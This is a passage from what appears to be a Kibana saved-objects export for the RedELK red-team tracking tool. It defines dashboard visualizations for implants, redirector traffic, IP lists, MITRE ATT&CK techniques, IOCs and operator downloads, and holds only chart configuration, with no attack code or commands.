implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":17,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Hostname\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top computers with new implants\"}"}, "coreMigrationVersion": "7.16.3", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363346672, 1165], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"NOT (redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - Decoy", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - Decoy\"}"}, "coreMigrationVersion": "7.16.3", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363346672, 1167], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"(redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - C2", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - C2\"}"}, "coreMigrationVersion": "7.16.3", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363346672, 1169], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists metrics", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists metrics\",\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"IPs\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"group\"}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}}}"}, "coreMigrationVersion": "7.16.3", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1171], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Techniques\"}"}, "coreMigrationVersion": "7.16.3", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1173], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Tactics\"}"}, "coreMigrationVersion": "7.16.3", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1175], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.source\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1177], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Modules results donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Modules results donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"split\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.last_run.status\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"row\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1179], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC Types tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Types\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - IOC Types tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1181], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Screenshots total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1183], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Alarmed IOC\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Alarmed IOC\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Alarmed IOC over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1185], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Downloads\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Downloads per user tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1187], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links external", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**External tools** : [MITRE ATT&CK Navigator](/attack-navigator/) | [Jupyter Notebook](/jupyter/) | [Neo4j Browser](/neo4jbrowser/) \",\"openLinksInNewTab\":true},\"title\":\"RedELK - Dashboard links external\"}"}, "coreMigrationVersion": "7.16.3", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1645363346672, 1188], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Techniques unique count total ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"threat.technique.id\",\"customLabel\":\"MITRE ATT&CK Techniques\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - TTP Techniques unique count total \"}"}, "coreMigrationVersion": "7.16.3", "id": "464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1190], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "title": "RedELK - HTTP Redir filters", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir filters\",\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1627506187584\",\"fieldName\":\"redir.backend.name\",\"parent\":\"\",\"label\":\"Backend\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1627507362404\",\"fieldName\":\"source.as.organization.name\",\"parent\":\"\",\"label\":\"ASN\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"},{\"id\":\"1627507398459\",\"fieldName\":\"source.geo.country_iso_code\",\"parent\":\"\",\"label\":\"Country\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_2_index_pattern\"},{\"id\":\"1627507415074\",\"fieldName\":\"tags\",\"parent\":\"\",\"label\":\"Tags\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_3_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":true,\"pinFilters\":false}}"}, "coreMigrationVersion": "7.16.3", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_1_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_2_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_3_index_pattern", "type": "index-pattern"}], "sort": [1645363346672, 1195], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Implants total count ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Implants\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Implants total count \"}"}, "coreMigrationVersion": "7.16.3", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1197], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - IOC total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": 